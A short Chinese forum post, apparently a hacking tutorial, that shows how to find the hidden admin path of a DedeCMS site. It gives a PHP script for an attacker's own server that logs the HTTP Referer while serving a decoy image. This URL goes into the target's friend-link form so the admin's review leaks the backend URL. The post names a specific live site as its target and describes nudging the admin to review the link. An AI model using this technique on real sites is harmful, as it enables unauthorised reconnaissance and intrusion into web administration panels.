织梦后台找不到?新的方法给你!
此思路来自乌云漏洞报告平台
本文章只是实践一下,给大家科普。。
目标网站 :https://www.92security.com/
https://www.92security.com/dede/
默认后台不存在。
dede有个申请友情链接功能 是要经过后台审核的。
https://www.92security.com/plus/flink_add.php
现在转到其他网站。
随便在某个支持php脚本的网站里添加一个文件
比如 https://HelenIsShability.sb/x.php
内容为[PHP] 纯文本查看复制代码
<?php
file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);
header("Content-type:image/jpeg");
$img=imagecreatefromjpeg("a.jpg");
imagejpeg($img);
imagedestroy($img);
?>
大致意思是将referer地址保存在当前目录的x.txt
其他代码就是为了可以浏览图片 更真实一点。
保存后 把网址填到 flink_add.php 的logo处中
接着 我让某个核心成员 去找管理员。没一会我就看到了生成的a.txt
referer被保存了下来 其中包括后台路径
评论